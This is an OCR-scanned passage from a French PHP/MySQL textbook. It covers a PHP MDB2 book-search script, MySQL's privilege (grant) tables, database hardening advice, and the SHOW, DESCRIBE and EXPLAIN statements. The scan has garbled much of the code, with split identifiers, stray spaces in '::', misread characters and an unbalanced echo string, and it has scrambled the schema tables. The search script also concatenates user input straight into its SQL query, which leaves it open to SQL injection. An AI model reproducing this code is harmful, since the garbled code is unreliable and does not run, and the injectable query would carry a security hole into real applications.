// Creation d'une chaine de connexion universelle ou DSN 
// (Data Source Name) 

$dsn = "mysqli: // " .$utilisateur. " : " .$mdp. "@" .$hote. "/" .$nom_base; 
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// Connexion a la base 

$db = &MDB2: : connect ($dsn) ; 

// Teste la connexion 

if (MDB2: :isError($db) ) { 

echo $db->getMessage( ) ; 

exit; 

} 

// Creation et execution de la requete 

$requete = "select * from livres where " . $type_recherche . 
"like '%" . $terme_recherche . "%'"; 

$resultat = $db->query ($requete) ; 

// Teste le resultat 
if (MDB2: : isError ($resultat) ) { 
echo $db->getMessage( ) ; 
exit; 

} 

// Recupere le nombre de lignes du resultat 
$nb_lig_resultat = $resultat->numRows( ) ; 

// Affiche toutes les lignes du resultat 
for ($i = 0; $i < $nb_lig_resultat ; $i++) { 

$ligne = $resultat->f etchRow(MDB2_FETCHMODE_ASSOC) ; 

echo "<p><strong>" . ($i+1) . ". Titre : "; 

echo htmlspecialchars(stripslashes($ligne[ ' tit re ' ] ) ) ; 

echo "</strong><br />Auteur  : "; 

echo stripslashes($ligne[ 'auteur' ] ) ; 

echo "<br />ISBN  : "; 

echo stripslashes($ligne[ ' isbn ' ] ) ; 

echo "<br />Prix  : "; 

echo stripslashes($ligne[ 'prix' ] ) ; 

echo ' </p> 1 ; 

} 

// Deconnexion de la base 
$db->disconnect ( ) ; 

?> 

</body> 
</html> 



Examinons les differences qui apparaissent dans ce script par rapport a la version mysqli. 

Pour nous connecter a la base de donnees, nous nous servons de la ligne suivante : 

$db = MDB2: :connect($dsn) ; 

Cette fonction prend en parametre une chame de connexion universelle qui contient 
toutes les informations indispensables pour se connecter a une base de donnees. On 
s'en rend compte lorsqu'on examine le format de la chaine de connexion : 

$dsn = "mysqli://" . $utilisateur . ":" . $mdp . 
$hote . "/" . $nom_base"; 
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Puis nous verifions le bon etablissement de la connexion avec la methode isError ( ) ; en 
cas de probleme, nous affichons le message d'erreur et nous arretons l'execution du script : 

if (DB: : isError ($db) ) { 
echo $db->getMessage( ) ; 
exit ; 

} 

Si tout s'est bien passe, nous construisons une requete et nous l'executons de la maniere 
suivante : 

$resultat = $db->query ($query) ; 
Nous pouvons verifier le nombre de lignes retournees : 

$nb_lig_resultat = $resultat->numRows( ) ; 
Nous recuperons chaque ligne de la maniere suivante : 

$ligne = $resultat->f etchRow(MDB2_FETCHM0DE_ASS0C) ; 
La methode generique f et_chRow( ) peut recuperer les lignes sous plusieurs formats ; le 
parametre MDB2 FETCHMODE ASSOC indique que nous souhaitons ici que la ligne soit 
renvoyee sous forme de tableau associatif. 

Apres le traitement des lignes du resultat, nous fermons la connexion a la base de donnees : 
$db->disconnect ( ) ; 

Comme vous pouvez le voir, cet exemple generique ressemble beaucoup a notre 
premier script. 

L'interet de MDB2 est qu'il suffit de connaitre un seul ensemble de fonctions de base de 
donnees et que le code ne necessitera done que peu de modifications en cas de change- 
ment du logiciel de base de donnees. 

Ce livre etant consacre a MySQL, nous ne nous servirons que des bibliotheques natives 
de MySQL pour des raisons de rapidite d'execution et de flexibilite. Cependant, le 
recours a une couche d' abstraction peut parfois se reveler extremement pratique. 

Pour aller plus loin 

Pour plus d' informations sur les connexions MySQL/PHP, reportez-vous aux sections 
appropriees des manuels de PHP et de MySQL. 

Vous trouverez plus d' informations sur ODBC sur la page http://www.webope- 
dia.com/TERM/O/odbc.html. 

Pour la suite 

Au prochain chapitre, nous nous interesserons aux details de 1' administration MySQL 
et nous verrons comment optimiser les bases de donnees. 
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Dans ce chapitre, nous presenterons quelques aspects plus techniques de MySQL, 
comme les privileges avances, la securite et l'optimisation. 

Les details du systeme des privileges 

Au cours du Chapitre 9, nous avons vu comment configurer des utilisateurs et leur attri- 
buer des privileges avec la commande GRANT. Si vous avez 1' intention d'administrer une 
base de donnees MySQL, il peut etre interessant de comprendre exactement comment 
fonctionne cette commande et ce qu'elle fait reellement. 

Lorsque vous executez une commande GRANT, celle-ci modifie les tables d'une base de 
donnees particuliere appelee mysql. Les informations de privileges sont enregistrees 
dans six tables de cette base de donnees. Sachant cela, lorsque vous accordez des privi- 
leges sur les bases de donnees, il faut faire attention a ne pas octroyer d'acces injustifies 
a la base mysql. 

Vous pouvez examiner le contenu de la base de donnees mysql en ouvrant une session 
sous le compte administrateur et en executant la commande suivante : 

use mysql; 

Pour afficher les tables de cette base de donnees, faites la commande suivante : 
show tables; 
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Vous devriez obtenir un resultat comparable a ceci : 

+ + 

| Tables_in_mysql | 
+ + 

| columns_priv | 

I db I 

| event | 

| tunc | 

| general_log | 

| help_category | 

| help_keyword | 

| help_relation | 

| help_topic | 

| host | 

| ndb_binlog_index | 

I plugin | 

| proc | 

| procs_priv | 

| servers | 

| slow_log | 

| tables_priv | 

| time_zone | 

| time_zone_leap_second | 

| time_zone_name | 

| time_zone_transition | 

| time_zone_transition_type | 

| user | 

+ + 

Chacune de ces tables contient des informations systeme. Six d'entre elles (user, host, 
db, tables priv, columns priv et procs priv) stockent les informations des privile- 
ges, et c'est pour cette raison qu'on les appelle parfois tables grant. La fonction speci- 
fique de ces tables varie, mais leur utilisation globale reste la meme : determiner ce que 
les utilisateurs ont le droit de faire et ce qu'ils n'ont pas le droit de faire. Chacune 
d'elles contient deux types de champs : les champs de portee, qui identifient l'utilisa- 
teur, l'hote et une partie d'une base de donnees a laquelle le privilege fait reference, et 
les champs de privileges, qui identifient les actions pouvant etre effectuees par 
l'utilisateur en question pour le champ de portee correspondant. 

Les tables user et host indiquent si un utilisateur peut se connecter au serveur MySQL et 
s'il possede des privileges d' administration. Les tables db et host determinent les bases de 
donnees auxquelles l'utilisateur peut acceder. La table tables priv determine les tables 
d'une base de donnees dont l'utilisateur peut se servir, la table columns priv determine 
les colonnes de ces tables auxquelles il peut acceder et la table procs priv indique les 
procedures que l'utilisateur a le droit d'executer. 
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La table user 

La table user contient les details des privileges globaux de l'utilisateur. Elle determine 
si l'utilisateur a le droit de se connecter au serveur MySQL et s'il possede des privile- 
ges globaux, c'est-a-dire des privileges valables pour toutes les bases de donnees du 
systeme. 

Vous pouvez consulter la structure de cette table avec 1' instruction describe user;. 
Le schema de cette table user est presente dans le Tableau 12.1. 

Tableau 12.1 : Le schema de la table user dans la base de donnees mysql 



Champ 


Type 


Host 


varchar(60) 


User 


varchar(16) 


Password 


char(16) 


Select priv 


enum( 'N' , 'Y' ) 


Insert priv 


enum( 'N' , 'Y') 


Update priv 


enum( 'N' , 'Y' ) 


Delete priv 


enum( 'N' , 'Y' ) 


Create priv 


enum( 'N' , 'Y' ) 


Drop priv 


enum( 'N' , 'Y' ) 


Reload priv 


enum( 'N' , 'Y' ) 


Shutdown priv 


enum( 'N' , 'Y' ) 


Process priv 


enum( 'N' , 'Y' ) 


File priv 


enum( 'N' , 'Y' ) 


Grant priv 


enum( 'N' , 'Y' ) 


References priv 


enum( 'N' , 'Y' ) 


Index priv 


enum( 'N' , 'Y' ) 


Alter priv 


enum( 'N' , 'Y' ) 


Show db priv 


enum( 'N' , 'Y' ) 


Super priv 


enum( 'N' , 'Y' ) 


Create tmp table priv 


enum( 'N' , 'Y' ) 


Lock tables priv 


enum( 'N' , 'Y' ) 
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Tableau 12.1 : Le schema de la table user dans la base de donnees mysql (suite) 



Champ 


Type 






Execute priv 


enum( 


N ' 


, ' Y ' ) 


Repl slave priv 


enum( 


N ' 


, ' Y ' ) 


Repl client priv 


enum( 


N ' 


, ' Y ' ) 


Create view priv 


enum( 


N ' 


, ' Y ' ) 


Show view priv 


enum( 


N ' 


, ' Y ' ) 


Create routine priv 


enum( 


N ' 


, ' Y ' ) 


Alter routine priv 


enum( 


N ' 


, ' Y ' ) 


Create user priv 


enum( 


N ' 


, ' Y ' ) 


Event priv 


enum( 


N ' 


, ' Y ' ) 


Trigger priv 


enum( 


N ' 


, ' Y ' ) 


ssl type 


enum( 


) 


'ANY' , 'X509 


ssl cipher 


blob 






x509 issuer 


blob 






x509 subject 


blob 






max questions 


int(11) 


unsigned 


max updates 


int(11) 


unsigned 


max connections 


int(11) 


unsigned 


max user connections 


int(11) 


unsigned 



, 'SPECIFIED' ) 



Chaque ligne de cette table correspond a un ensemble de privileges pour un utilisateur 
(User) provenant d'un note (Host) particulier et ayant ouvert une session avec le mot de 
passe Password. Ces colonnes (les trois premieres) correspondent aux champs de 
portee de cette table, puisqu'ils decrivent la portee des autres champs, appeles les 
champs de privileges. 

Les privileges indiques dans cette table (et les suivantes) correspondent a ceux que nous 
avons accordes avec GRANT au Chapitre 8. Par exemple, Select priv correspond au 
privilege qui permet d'executer une commande SELECT. 

Si un utilisateur possede un privilege particulier, la valeur dans la colonne correspon- 
dante est Y. Inversement, cette colonne vaut N s'il ne possede pas le privilege. 
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Tous les privileges enumeres dans la table user sont globaux, c'est-a-dire qu'ils 
s'appliquent a toutes les bases de donnees du systeme (y compris a la base de donnees 
mysql). Par consequent, les administrateurs possedent generalement quelques Y dans 
ces colonnes, mais la majorite des utilisateurs ne doit posseder que des N. Les utilisa- 
teurs normaux doivent posseder des privileges pour les bases de donnees dont ils 
doivent se servir et non pour toutes les tables. 

Les tables db et host 

La plupart des privileges des utilisateurs normaux sont enregistres dans les tables db et host. 

La table db determine les bases de donnees auxquelles les utilisateurs peuvent acceder, 
ainsi que les hotes a partir desquels ils peuvent y acceder. Les privileges indiques dans 
cette table sont valables pour toutes les bases de donnees dont le nom se trouve dans les 
lignes de cette table. 

La table host complete les tables user et db. Si un utilisateur doit pouvoir se connecter 
a une base de donnees a partir de plusieurs hotes, aucun hote ne sera indique pour cet 
utilisateur dans la table user ou db. En revanche, cet utilisateur possedera un ensemble 
d'entrees dans la table host, qui permet de preciser les privileges associes a chaque 
combinaison utilisateur/hote. 

Les schemas de ces deux tables sont presentes, respectivement, dans les Tableaux 12.2 
et 12.3. 



Tableau 12.2 : Le schema de la table db de la base de donnees mysql 



Champ 


Type 




Host 


char(60) 




Db 


char(64) 




User 


char(16) 




Select priv 


enum( 1 N ' , 


' Y' ) 


Insert priv 


enum( 1 N ' , 


'Y') 


Update priv 


enum( 1 N ' , 


'Y') 


Delete priv 


enum( 1 N ' , 


'Y') 


Create priv 


enum( 1 N ' , 


'Y') 


Drop priv 


enum( 1 N ' , 


'Y') 


Grant priv 


enum( 1 N ' , 


'Y') 
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Tableau 12.2 : Le schema de la table db de la base de donnees mysql (suite) 



Chump 


Type 






References priv 


enum ( 


N ' 


1 Y 1 ) 


Index priv 


enum ( 


N ' 


1 Y' ) 


Alter priv 


enum ( 


N ' 


1 Y' ) 


Create tmp tables priv 


enum ( 


N ' 


1 Y' ) 


Lock tables priv 


enum ( 


N ' 


1 Y' ) 


Create view priv 


enum ( 


N 1 


Y 1 ) 


Show view priv 


enum ( 


N 1 


Y' ) 


Create routine priv 


enum ( 


N 1 


V 1 \ 

Y ) 


Alter routine priv 


enum( 


N' 


Y') 


Execute priv 


enum( 


N' 


Y 1 ) 


Event priv 


enum( 


N' 


Y ' ) 


Trigger priv 


enum( 


N' 


Y 1 ) 


Tableau 12.3 : Le schema de la table host de la base de donnees mysql 


Champ 


Type 






Host 


char(60) 




Db 


char(64) 




Select priv 


enum( 


N' 


'Y') 


Insert priv 


enum( 


N' 


' Y' ) 


Update priv 


enum( 


N' 


'Y') 


Delete priv 


enum( 


N' 


' Y' ) 


Create priv 


enum( 


N' 


'Y') 


Drop priv 


enum( 


N' 


' Y' ) 


Grant priv 


enum( 


N' 


'Y') 


References priv 


enum( 


N' 


' Y' ) 


Index priv 


enum( 


N' 


'Y') 
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Tableau 12.3 : Le schema de la table host de la base de donnees mysql (suite) 



Champ 


Type 


Alter priv 


enum ( 1 N 1 , 1 Y ' ) 


Create tmp tables priv 


enum( N , Y ) 


Lock tables priv 


enum( N , Y ) 


Create view priv 


enum ( 1 N ' , Y 1 ) 


Show view priv 


enum ( ' N 1 , Y ' ) 


Create routine priv 


enum( 1 N 1 ,Y' ) 


Alter routine priv 


enum( 1 N 1 ,Y' ) 


Execute priv 


enum( 1 N 1 ,Y' ) 


Trigger priv 


enum( 1 N 1 ,Y' ) 


Les tables ta b les _priv, columns _priv et procs _priv 

Ces trois tables servent, respectivement, a enregistrer les privileges au niveau des 
tables, au niveau des colonnes et pour les procedures stockees. 


Ces tables ont une structure legerement differente des tables user, db et host. Leurs 
schemas sont presentes dans les Tableaux 12.4, 12.5 et 12.6. 


Tableau 12.4 : Le schema de la table tables jpriv de la base de donnees mysql 


Champ 


Type 


Host 


char(60) 


Db 


char(64) 


User 


char(16) 


Table name 


char(60) 


Grantor 


char(77) 


Timestamp 


timestamp(14) 


Table priv 


set (' Select ' , 'Insert', 'Update', 'Delete', 
'Create', 'Drop', 'Grant', 'References', 'Index', 
'Alter', 'Create View', 'Show View', Trigger) 


Column priv 


set (' Select 1 , 'Insert', 'Update', 'References') 
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Tableau 12.5 : Le schema de la table columns _priv de la base de donnees mysql 



Champ 


Type 


Host 


char(60) 


Db 


char(64) 


User 


char(16) 


Table name 


char(64) 


Column name 


char(64) 


Timestamp 


timestamp(14) 


Column priv 


set (' Select 1 , 'Insert', 'Update', 'References') 


Tableau 12.6 : 


Le schema de la table procs jpriv de la base de donnees mysql 


Champ 


Type 


Host 


char(60) 


Db 


char(64) 


User 


char(16) 


Routine name 


char(64) 


Routine type 


enum( 'FUNCTION' , 'PROCEDURE') 


Grantor 


char(77) 


Proc priv 


set (' Execute ', 'Alter Routine', 'Grant') 


Timestamp 


timestamp(14) 



La colonne Grantor des tables tables priv et procs priv contient le nom de l'utili- 
sateur qui a fourni ce privilege a l'utilisateur considere. La colonne Timestamp de ces 
trois tables contient la date et l'heure courantes au moment ou ce privilege a ete 
accorde. 

Controle d'acces : utilisation des tables de privileges par MySQL 

MySQL se sert des tables des privileges pour determiner ce qu'un utilisateur a le droit 
de faire. Cette operation s'effectue en deux etapes : 

1. Verification de la connexion. Dans cette etape, MySQL verifie si vous avez le droit 
de vous connecter compte tenu des informations de la table user, comme nous 
l'avons deja vu. Cette authentification prend en compte votre nom d' utilisateur, 
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votre nom d'hote et votre mot de passe. Si un nom d'utilisateur est laisse vide dans 
la table user, il correspond a tous les utilisateurs. Les noms d'hotes peuvent conte- 
nir un joker (%) qui peut remplacer l'integralite du champ (dans ce cas, le % corres- 
pond a tous les hotes) ou uniquement une partie du nom d'hote (par exemple, 
%. tangledweb.com.au correspond a tous les hotes dont le nom se termine par 
.tangledweb.com.au). Si le champ du mot de passe est laisse vide, aucun mot de 
passe n'est necessaire. Pour des raisons de securite, il vaut mieux eviter que la table 
user contienne une ligne ne contenant aucun nom d'utilisateur, aucun mot de passe 
et un nom d'hote uniquement compose d'un joker. Si le nom d'hote est vide, 
MySQL se refere a la table host afin de trouver une entree user et host correspon- 
dante. 

2. Verification des requetes. A chaque fois que vous envoyez une requete apres avoir 
etabli une connexion, MySQL verifie si vous avez le niveau de privileges approprie. 
Le systeme commence par verifier les privileges globaux (dans la table user) ; s'ils 
ne sont pas suffisants, il verifie les tables db et host. Si vous n'avez toujours pas les 
privileges suffisants, MySQL verifie la table tables priv et enfin la table 
columns priv (si l'operation implique des procedures stockees, il verifie la table 
procs priv au lieu de ces deux tables). 

Mise a jour des privileges : a quel moment les modifications prennent-elles 
eff et ? 

Le serveur MySQL lit automatiquement les tables des privileges lors de son demarrage 
et lorsque vous executez des instructions GRANT et REVOKE. Cependant, maintenant que 
nous savons ou et comment ces privileges sont enregistres, nous pouvons les modifier 
manuellement. Dans ce cas, le serveur MySQL ne remarquera pas que vous les avez 
modifies. 

II faut done indiquer au serveur qu'une modification est intervenue. Pour cela, vous 
disposez de trois techniques. Vous pouvez utiliser la commande : 

flush privileges; 

a l'invite de MySQL (vous devez avoir ouvert une session sous le compte d'un adminis- 
trateur). II s'agit de la maniere la plus courante pour mettre a jour les privileges. 

Mais vous pouvez egalement utiliser : 
mysqladmin flush-privileges 

ou : 

mysqladmin reload 
a partir de l'invite de commande de votre systeme d'exploitation. 
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Apres cette operation, les niveaux de privileges globaux seront verifies lors de la 
prochaine connexion d'un utilisateur. Les privileges de niveau base de donnees 
seront verifies lors de 1' execution de la prochaine instruction d' utilisation, et les 
privileges au niveau des tables et des colonnes le seront lors de la prochaine requete 
d'utilisateur. 

Securiser une base de donnees MySQL 

La securite est tres importante, en particulier lorsque vous connectez une base de 
donnees MySQL a votre site web. Dans cette section, nous allons nous interesser aux 
precautions que vous devez prendre afin de proteger votre base de donnees. 

MySQL du point de vue du systeme d'exploitation 

Sur un systeme Unix, il est fortement deconseille d'executer le serveur MySQL 
(mysqld) sous le compte de l'utilisateur root. En effet, cela donnerait a n'importe quel 
utilisateur de MySQL des droits d'acces complets en lecture et en ecriture sur tous les 
fichiers du systeme. Ce point est particuherement sensible et Ton a tendance a l'oublier 
un peu trop souvent. Cette erreur a notamment ete mise a profit pour pirater le site web 
d'Apache (heureusement, les pirates etaient amicaux et n'avaient pour seul but que 
d'ameliorer la securite du site). 

II vaut done mieux creer un utilisateur MySQL particulier pour l'execution de mysqld. 
En outre, il devient alors possible de rendre les repertoires (dans lesquels les donnees 
sont enregistrees) accessibles uniquement pour cet utilisateur. Dans de nombreuses 
installations, le serveur est configure pour etre execute sous le compte de l'utilisateur 
mysql avec le groupe mysql. 

Idealement, il faut aussi placer votre serveur MySQL derriere un pare-feu. De cette 
maniere, vous pourrez interrompre les connexions provenant d'ordinateurs non autori- 
ses. Testez si vous pouvez vous connecter a votre serveur depuis l'exterieur en passant 
par le port 3306, qui est le port par defaut de MySQL et qui devrait etre bloque par votre 
pare-feu. 

Mots de passe 

Verifiez que tous vos utilisateurs possedent des mots de passe (et tout particuherement 
root !), que ceux-ci sont bien choisis et qu'ils sont regulierement modifies, comme 
pour les mots de passe de votre systeme d'exploitation. II vaut mieux eviter les mots de 
passe contenant des mots provenant d'un dictionnaire et leur preferer des combinaisons 
de lettres et de chiffres. 
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S'il vous faut stacker des mots de passe dans des scripts, assurez-vous que seul l'utili- 
sateur dont le mot de passe est enregistre dans un script a le droit de le lire. 

Les scripts PHP utilises pour se connecter a la base de donnees ont besoin de connaitre 
le mot de passe de l'utilisateur concerne. II est possible de securiser cette operation en 
placant le nom d'utilisateur et le mot de passe dans un fichier appele, par exemple, 
dbconnect.php, puis d'inclure celui-ci lorsque vous en avez besoin. Ce fichier doit etre 
soigneusement conserve a l'exterieur de l'arborescence des documents web et etre 
accessible uniquement a l'utilisateur approprie. N'oubliez pas que, si vous placez ces 
informations dans un fichier .inc (ou une autre extension) dans l'arborescence des docu- 
ments web, vous devez verifier que votre serveur web sait que ces fichiers doivent etre 
interpretes comme des fichiers PHP pour qu'ils ne s'affichent pas comme du texte brut 
dans un navigateur web. 

Ne stockez pas les mots de passe en clair dans votre base de donnees. Les mots de passe 
MySQL ne sont pas enregistres de cette maniere, mais il arrive souvent que dans le 
cadre d' applications web on souhaite enregistrer les noms des comptes utilisateurs et 
les mots de passe des membres du site. Vous pouvez chiffrer (de maniere non reversi- 
ble) vos mots de passe avec la fonction password ( ) de MySQL. Si vous utilisez un mot 
de passe chiffre dans une clause SELECT (pour ouvrir une session utilisateur), vous 
devrez utiliser la meme fonction de chiffrement pour tester le mot de passe saisi par 
l'utilisateur. 

Nous reviendrons sur cette fonctionnalite lorsque nous implementerons des projets, 
dans la Partie 5. 

Privileges des utilisateurs 

La connaissance du systeme de privileges est essentielle. Vous devez done bien 
comprendre ce systeme, ainsi que les consequences de certains privileges. D'une 
maniere generale, ne donnez pas plus de droits a vos utilisateurs qu'ils en ont reellement 
besoin. Pour vous en assurer, vous pouvez examiner les tables de privileges. 

Les privileges PROCESS, FILE, SHUTDOWN et RELOAD, notamment, ne doivent etre accordes 
qu'aux administrateurs, a moins qu'il ne soit absolument necessaire de les octroyer a un 
autre utilisateur. Le privilege PROCESS permet de savoir ce que font les autres utilisa- 
teurs et ce qu'ils tapent au clavier, y compris leurs mots de passe. Le privilege FILE 
permet de lire et de modifier les fichiers de n'importe quel repertoire du systeme 
d' exploitation (y compris le fichier /etc/passwd d'un systeme Unix, par exemple). 

Le privilege GRANT doit egalement etre accorde avec precaution, puisqu'il permet aux 
utilisateurs de partager leurs privileges avec d' autres. 
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Lorsque vous creez les utilisateurs, assurez-vous de ne leur accorder l'acces qu'a partir 
de l'ordinateur d'ou ils seront censes ouvrir une session. Par exemple, si l'un de vos 
utilisateurs s'appelle j eanne@localhost, tout va bien. En revanche, si cet utilisateur 
s'appelle simplement jeanne, il pourra ouvrir une session depuis n'importe quel ordi- 
nateur et il se peut qu'elle ne soit pas la jeanne que vous connaissez. Pour la meme 
raison, evitez d'employer des jokers dans les noms d'hotes. 

Vous pouvez encore ameliorer la securite de votre systeme en utilisant des adresses IP a 
la place des noms de domaines dans la table host. Cela vous epargnera bien des proble- 
mes en cas de piratage de votre DNS ou, plus simplement, en cas d'erreur. Pour aller 
encore plus loin, vous pouvez demarrer le demon MySQL avec l'option skip name 
resolve, qui demande au serveur de ne lire que les adresses IP ou localhost dans les 
colonnes contenant des noms d'hotes. 

II faut egalement empecher les utilisateurs normaux d'acceder au programme mysqlad 
min de votre serveur web. Comme ce programme est execute a partir de la ligne de 
commande, il peut poser probleme au niveau des droits du systeme d'exploitation. 

Problemes relatifs au Web 

Le fait de connecter une base de donnees MySQL au Web pose certains problemes de 
securite particuliers. 

II peut etre interessant de creer un utilisateur special, reserve aux connexions web. De 
cette maniere, vous pouvez lui fournir uniquement des privileges minimaux et ne pas 
lui accorder, par exemple, les privileges DROP, ALTER ou CREATE. Vous pouvez egalement 
lui accorder le privilege SELECT seulement sur les tables des catalogues et INSERT 
uniquement pour les tables des commandes. C'est, ici aussi, une illustration du principe 
de privileges minimaux. 

— Attention 

Nous avons vu au chapitre precedent comment utiliser les fonctions addslashes() et 
stripslashes ( ) de PHP pour se debarrasser des caracteres susceptibles de poser probleme 
dans les chaTnes. II ne faut pas oublier cette etape. N'oubliez pas non plus de nettoyer les 
donnees que vous envoyez a MySQL. Vous vous rappelez peut-etre que nous nous sommes 
servis de la fonction doubleval() pour verifier que les donnees numeriques contiennent 
reellement des nombres. II arrive souvent que I'on omette cette verification : on pense a 
utiliser addslashes( ), mais pas toujours a verifier les valeurs numeriques. 



Toutes les donnees provenant des utilisateurs doivent etre verifiees. Meme si votre 
formulaire HTML ne contient que des cases a cocher et des boutons radio, une 
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personne malveillante peut tres bien modifier l'URL pour tenter de pirater votre script. 
II est egalement conseille de verifier la taille des donnees recues. 

Si les utilisateurs saisissent des mots de passe ou des donnees confidentielles destines a 
etre enregistres dans votre base de donnees, n'oubliez pas que ces informations sont 
transmises en clair entre le navigateur et le serveur, a moins que vous n'utilisiez SSL 
(Secure Sockets Layer). Nous reviendrons en detail sur SSL et son utilisation. 

Obtenir plus d'informations sur les bases de donnees 

Jusqu'a maintenant, nous nous sommes servis de SHOW et de DESCRIBE pour identifier 
les tables d'une base de donnees et pour enumerer les colonnes de ces tables. Nous 
allons presenter d'autres techniques, comme l'utilisation de l'instruction EXPLAIN, pour 
obtenir plus d'informations sur le fonctionnement de SELECT. 

Obtenir des informations avec SHOW 

Nous avons deja utilise : 
show tables; 

pour obtenir une liste des tables d'une base de donnees. 
L'instruction : 

show databases; 

affiche la liste de toutes les bases de donnees disponibles. Vous pouvez ensuite vous 
servir de SHOW TABLES pour obtenir la liste des tables de l'une de ces bases : 

show tables from livres; 

Lorsque vous utilisez SHOW TABLES sans preciser la base de donnees, cette instruction 
choisit par defaut celle qui est en cours d'utilisation. 

Lorsque vous connaissez les tables, vous pouvez obtenir la liste de leurs colonnes : 

show columns from commandes from livres; 

Si vous ne precisez pas la base de donnees, l'instruction SHOW COLUMNS choisit par 
defaut la base de donnees en cours d'utilisation. Vous pouvez aussi utiliser la convention 
base . table : 

show columns from livres . commandes ; 

Une autre variante tres interessante de l'instruction SHOW permet d'afficher les privileges 
d'un utilisateur. 

Si, par exemple, vous executez : 
show grants for bookorama; 
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vous obtiendrez la sortie suivante : 



Grants for bookorama@% 



GRANT USAGE ON *.* TO 1 bookorama 1 @ ' % ' 

IDENTIFIED BY PASSWORD 1 *1 ECE648641 438A28E1 91 0D0D7403C5EE9E8B0A85 1 
GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER 
ON 'livres'.* TO ' bookorama 1 1? '% ' 



I 



Les instructions GRANT qui s'affichent ne sont pas necessairement celles qui ont ete 
executees pour attribuer des privileges a un utilisateur particulier, mais sont plutot les 
instructions equivalentes qui produiraient le niveau de privilege actuel. 

II existe en fait plus d'une trentaine de variantes de l'instruction SHOW. Les plus utilisees 
sont presentees dans le Tableau 12.7 ; pour en connaitre la liste complete, consultez la 
section appropriee du manuel de MySQL, http://dev.mysql.eom/doc/refman/5.l/en/ 
show.html. Dans le tableau, toutes les occurrences de [like ou where] peuvent etre 
remplacees par LIKE motif ou WHERE expression. 



Tableau 12.7 : Syntaxe de l'instruction SHOW 



Variante 



Description 



SHOW DATABASES [like ou where] Donne la liste de toutes les bases de donnees disponibles. 



SHOW [OPEN] TABLES [FROM 
basededonnees] [like ou where] 

SHOW [FULL] COLUMNS FROM table 
[FROM basededonnees] 
[like ou where] 



SHOW INDEX FROM table [FROM 
basededonnees] 



SHOW [GLOBAL | SESSION] STATUS 
[like ou where] 



Donne la liste des tables de la base de donnees en cours 
d'utilisation ou dans la base de donnees basededonnees. 

Donne la liste de toutes les colonnes d'une table 
particuliere dans la base de donnees en cours 
d'utilisation ou a partir de la base de donnees indiquee. 
Vous pouvez utiliser SHOW FIELDS au lieu de SHOW 
COLUMNS. 

Donne les details de tous les index d'une table 
particuliere de la base de donnees en cours d'utilisation 
ou dans la base de donnees appelee basededonnees, si 
elle est specifiee. Vous pouvez egalement utiliser SHOW 
KEYS. 

Donne des informations sur certains elements du systeme, 
comme le nombre de threads en cours d'execution. 
Une clause LIKE permet de choisir les noms de ces 
elements. Par exemple, ' Thread% ' peut correspondre a 
'Threads cached', 'Threads connected', 
'Threads created' ou 'Threads running'. 
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Tableau 12.7 : Syntaxe de I'instruction SHOW (suite) 



Variante Description 



SHOW [GLOBAL | SESSION] 
VARIABLES [like ou where] 


Affiche les noms et les valeurs des variables systeme de 
MySQL, comme son numero de version. 


SHOW 


[FULL] PROCESSLIST 


Affiche la liste de tous les processus en cours 
d'execution dans le systeme, c'est-a-dire les requetes en 
cours de traitement. La plupart des utilisateurs voient 
uniquement leurs threads mais, s'ils possedent le 
privilege PROCESS, ils peuvent egalement voir les 
processus de tous les utilisateurs, y compris les mots de 
passe si ceux-ci sont precises dans les requetes. Par 
defaut, les requetes sont tronquees apres le centieme 
caractere. Vous pouvez utiliser le mot-cle facultatif FULL 
pour afficher l'integralite des requetes. 


SHOW TABLE STATUS [FROM 
basededonnees] [like ou where] 


Affiche des informations sur chacune des tables de la 
base de donnees en cours d' utilisation ou sur celles de la 
base de donnees basededonnees si elle est indiquee, 
eventuellement avec des jokers. Ces informations 
contiennent notamment le type des tables et la date de 
leur derniere mise a jour. 


SHOW 


GRANTS FOR utilisateur 


Affiche les instructions GRANT necessaires pour donner a 
l'utilisateur son niveau actuel de privileges. 


SHOW 


PRIVILEGES 


Affiche les differents privileges reconnus par le serveur. 


SHOW CREATE DATABASE 
basededonnees 


Affiche une instruction CREATE DATABASE qui creerait la 
base de donnees indiquee. 


SHOW 


CREATE TABLE nomtable 


Affiche une instruction CREATE TABLE qui creerait la 
table indiquee. 


SHOW 


[STORAGE] ENGINES 


Affiche les moteurs de stockage disponibles dans 
l'installation et inHinup le motpur Hp storkatrp nnr Hpfanf 
(nous reviendrons sur les moteurs de stockage au 
Chapitre 13). 


SHOW 


INNODB STATUS 


Affiche des donnees concernant l'etat actuel du moteur 
de stockage InnoDB. 


SHOW WARNINGS [LIMIT [decalage,] 
nombre lignes] 


Affiche toutes les erreurs, tous les avertissements et 
toutes les notifications produites par la derniere 
instruction qui a ete executee. 


SHOW ERRORS [LIMIT [decalage,] 
nombre lignes] 


N' affiche que les erreurs produites par la derniere 
instruction qui a ete executee. 



314 Partiell 



Utilisation de MySQL 



Obtenir des informations sur les colonnes avec DESCRIBE 

Outre l'instruction SHOW COLUMNS, vous pouvez utiliser l'instruction DESCRIBE, qui est 
semblable a l'instruction DESCRIBE d'Oracle (un autre RDBMS). En voici la syntaxe 
principale : 

DESCRIBE table [colonne]; 

Cette instruction fournit des informations sur toutes les colonnes de la table ou sur une 
colonne particuliere si colonne est precisee. II est possible de recourir a des jokers pour 
les noms des colonnes. 

Comprendre le fonctionnement des requetes avec EXPLAIN 

L'instruction EXPLAIN peut etre utilisee de deux manieres. Tout d'abord, vous pouvez 
utiliser : 

EXPLAIN table; 

Cette instruction renvoie un resultat comparable a celui de DESCRIBE table ou de SHOW 
COLUMNS FROM table. 

La seconde forme de EXPLAIN, la plus interessante, permet de voir exactement comment 
MySQL evalue une requete SELECT. Pour l'utiliser de cette maniere, il suffit de placer le 
mot-cle EXPLAIN devant une instruction SELECT. 

Vous pouvez utiliser l'instruction EXPLAIN pour deboguer une requete complexe qui ne 
fonctionne pas correctement ou lorsque l'execution d'une requete prend trop de temps. 
Si vous mettez en ceuvre des requetes complexes, vous pouvez commencer par tracer 
leur fonctionnement avant d'executer reellement la requete. Grace au resultat de cette 
instruction, vous pouvez meme corriger des requetes et les optimiser, si necessaire. 
II s'agit aussi d'un tres bon outil d'apprentissage. 

Par exemple, essayez d'executer la requete suivante sur la base de donnees de Book-O- 
Rama : 

explain 

select clients. nom 

from clients, commandes, livres_commandes , livres 

where clients. idclient = commandes . idclient 

and commandes . idcommande = livres_commandes.idcommande 

and livres_commandes . isbn = livres. isbn 

and livres. titre like '%Java%' ; 

Cette requete produit la sortie suivante (notez que nous l'affichons sous forme verti- 
cale parce que les lignes de la table sont trop larges pour tenir dans ce livre ; vous 
